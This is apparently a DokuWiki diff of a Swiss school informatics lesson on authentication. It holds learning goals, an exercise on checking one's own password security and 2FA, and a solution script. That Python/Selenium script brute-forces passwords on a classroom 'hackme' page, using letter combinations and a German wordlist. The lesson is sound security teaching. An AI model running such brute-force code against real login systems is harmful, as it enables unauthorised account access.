Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen der Seite angezeigt.

Link zu der Vergleichsansicht

Beide Seiten, vorherige Überarbeitung Vorherige Überarbeitung
Nächste Überarbeitung		 Vorherige Überarbeitung
gf_informatik:web_sca:authentifizierung [2024-03-03 21:49] scagf_informatik:web_sca:authentifizierung [2024-03-11 10:22] (aktuell) – [Authentifizierung] sca
Zeile 1: Zeile 1:
 ====== Authentifizierung ====== ====== Authentifizierung ======
  
-<nodisp 2> 
-++++Plan| 
- 
-   * Lektion 1: Märchenstunde, zusammen besprechen/kleine Gruppenarbeiten, bis und mit Passwortmanager 
-   * Lektion 2: Brute Force 
-   * Lektion 3: Brute Force II, Laufzeitanalyse 
-   * Lektion 4: Mehrfaktorauth. 
-   * Lektion 5: eigene Sicherheit verbessern 
- 
-++++ 
- 
-</nodisp> 
  
 ++++Lernziele| ++++Lernziele|
Zeile 25: Zeile 13:
    * Welche Massnahmen kann man im Bezug auf Passwörter treffen, um möglichst sicher zu sein?    * Welche Massnahmen kann man im Bezug auf Passwörter treffen, um möglichst sicher zu sein?
    * Wie kann man herausfinden, ob man bereits Opfer von Hackern wurde?    * Wie kann man herausfinden, ob man bereits Opfer von Hackern wurde?
-   Was ist eine **Brute-Force**-Attacke+   Erklären, was Idee hinter **Brute-Force**-Attacke ist und verschiedene Versionen davon kennen.
-   * Programmiere eine solche mit Python.+
    * Was sind die Stärken und Schwächen einer solchen Attacke?    * Was sind die Stärken und Schwächen einer solchen Attacke?
    * Was ist eine **Drei-Faktor-Authentifizierung**?    * Was ist eine **Drei-Faktor-Authentifizierung**?
Zeile 34: Zeile 21:
    * Was kann man selbst unternehmen, um möglichst sicher im Web unterwegs zu sein?    * Was kann man selbst unternehmen, um möglichst sicher im Web unterwegs zu sein?
    * Analysiere eine Situation (Bsp. Geschichte mit sieben Geisslein) und gebe Tipps, wie man die Sicherheit erhöhen könnte.    * Analysiere eine Situation (Bsp. Geschichte mit sieben Geisslein) und gebe Tipps, wie man die Sicherheit erhöhen könnte.
 +   * **Programmieren:**
 +     * Brute-Force Attacke und ähnliche Codes **Programmieren** können.
 +     * Wissen, wie File eingelesen wird.
 +
  
 ++++ ++++
Zeile 270: Zeile 261:
   * Für die meisten Betrüger:innnen lohnt sich der Aufwand eines Angriffs erst dann, wenn damit gleich //mehrere// Benutzerkonten auf einmal geknackt werden können.    * Für die meisten Betrüger:innnen lohnt sich der Aufwand eines Angriffs erst dann, wenn damit gleich //mehrere// Benutzerkonten auf einmal geknackt werden können. 
  
-=== Aufgabe 1 – Wo und wann werden mehrere Faktoren geprüft? === 
  
-  - Angenommen, du hättest an deinem Safe einfach drei Pin-Code-Schlösser. Wäre das dann auch eine Drei-Faktor-Authentifizierung? Wäre sie mehr oder weniger sicher als die Variante mit Schlüssel, Pin-Code und Fingerabdruck?  +=== Aufgabe 1 – Prüfe und verbessere deine IT-Sicherheit ===
-  - Überlege zu den Situationen, die du in Aufgabe A genannt hast, welche Faktoren (Wissen, Besitz, Inhärenz) jeweils geprüft werden: +
-    - Eintritt zu einem Konzert, Mobiltelefon entsperren, Prüfungszulassung (z.B. Aufnahmeprüfung), Reisen in andere Länder (am Zoll), Covid-Zertifikat mit Ausweis, Fahrerlaubnis via Führerschein, Bahnbillet mit Swisspass etc. +
-  - Viele Leute zahlen Rechnungen heute direkt mit der E-Banking-App auf ihrem Smartphone: App öffnen, Rechnung scannen, Zahlung bestätigen. Welche Authentifzierung ist dabei erfolgt? Beschreibe mit obigen Fachbegriffen. +
  
 +   1. **Analyse:**
 +     1. Erstelle eine Liste aller Webseiten, die du (seltener oder öfter) besuchst und die eine Authentifizierung erfordern.
 +     1. Überlege, bei wie vielen du die gleiche E-Mail-Adresse und das gleiche Passwort nutzt.
 +     1. Du nutzt wohl auch Apps, die eine Authentifizierung verlangen, jedoch nur einmalig, bei jedem erneuten Öffnen ist keine neue Authentifizierung nötig. Was ist die Überlegung dahinter? Was wird vorausgesetzt?
 +   1. **Schwachstellen schliessen:**
 +     1. Überlegen, welche Lösung dir am sinnvollsten erscheint: Passwortmanager im Browser? Andere Passwortmanager?
 +     1. Nötige Änderungen vornehmen: Zweifaktor-Authentifzierung aktivieren, evtl. PW-Manager installieren, evtl. einzelne Passwörter ändern.
 +     1. Mindestens folgende Sicherheitsmassnahmen sollten umgesetzt werden:
 +       1. Besonderes Passwort und 2FA beim E-Mail-Konto (Achtung: wahrscheinlich muss ein Key ausgedruckt werden, der unbedingt aufbewahrt werden muss).
 +       1. Laptop und Smartphone mit Passwort/Fingerabdruck o.ä. gesperrt.
  
- 
-==== Aufgabe 2 – Prüfe und verbessere deine IT-Sicherheit ==== 
- 
-  - Analyse:  
-    - Erstelle eine Liste aller Webseiten, die du (seltener oder öfter) besuchst und die eine Authentifizierung erfordern. 
-    - Überlege, bei wie vielen du die gleiche E-Mail-Adresse und das gleiche Passwort nutzt. 
-    - Du nutzt wohl auch Apps, die eine Authentifizierung verlangen, jedoch nur einmalig, bei jedem erneuten Öffnen ist keine neue Authentifizierung nötig. Was ist die Überlegung dahinter? Was wird vorausgesetzt? 
-  - Schwachstellen schliessen: 
-    - Überlegen, welche Lösung dir am sinnvollsten erscheint: Passwortmanager im Browser? Andere Passwortmanager? 
-    - Nötige Änderungen vornehmen: Zweifaktor-Authentifzierung aktivieren, evtl. PW-Manager installieren, evtl. einzelne Passwörter ändern. 
-    - Mindestens Folgende Sicherheitsmassnahmen müssen Sie umgesetzt haben: 
-      - Besonderes Passwort und 2FA beim E-Mail-Konto 
-      - Laptop und Smartphone mit Passwort/Fingerabdruck o.ä. gesperrt. 
  
 ===== Lösungen ===== ===== Lösungen =====
Zeile 296: Zeile 280:
 <nodisp 1> <nodisp 1>
  
-Brute-Force:+++++Brute-Force|
  
 <code python> <code python>
 +### requires: `pip install selenium`
 + 
 +### DON'T CHANGE CODE FROM HERE ...
 +from selenium import webdriver
 +from selenium.webdriver.common.by import By
 + 
 +# url to website
 +url_website = "https://if.ksr.ch/sca/hackme/"
 + 
 +# Open the webpage
 +driver = webdriver.Chrome()
 +driver.get(url_website)
 + 
 +# Enter text and click button -> not relevant for our hack
 +input_field = driver.find_element(By.ID,"textInput") # find the input box ...
 +input_field.send_keys("guess pw here") # ... and insert text
 +button = driver.find_element(By.ID,"btnSend") # find the button ...
 +button.click() # ... and click it
 + 
 +### ... UNTIL HERE
 +### WRITE YOUR CODE BETWEEN HERE ...
  
-</code>+alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
  
-<code python>+## PASSWORD 1 
 +print("PASSWORD 1") 
 +for pw in alphabet: 
 +    code,message = driver.execute_script(f'return check_pw("{pw}")') # try password on website, returns code and message 
 +    if code == 201: 
 +        print(pw) 
 +        print(message)
  
 +## PASSWORD 2
 +print("PASSWORD 2")
 +for x in alphabet:
 +    for y in alphabet:
 +        for z in alphabet:
 +            pw = x + y + z
 +            code,message = driver.execute_script(f'return check_pw("{pw}")') # try password on website, returns code and message
 +            if code == 201:
 +                print(pw)
 +                print(message)
 + 
 +## PASSWORD 3
 +print("PASSWORD 3")
 +
 +with open("woerter_top10000de_upper.txt",'r') as file:
 +    for line in file:
 +        pw = line.strip() # strip entfernt Leerschläge und Zeilenumbrüche am Anfang und Ende
 +        code,message = driver.execute_script(f'return check_pw("{pw}")') # try password on website, returns code and message
 +        if code == 201:
 +            print(pw)
 +            print(message)
 +
 +### ... AND HERE. DON'T CHANGE LAST LINE:
 +driver.quit() # Close the browser
 </code> </code>
 +
 +++++
  
  
  • gf_informatik/web_sca/authentifizierung.1709502584.txt.gz
  • Zuletzt geändert: 2024-03-03 21:49
  • von sca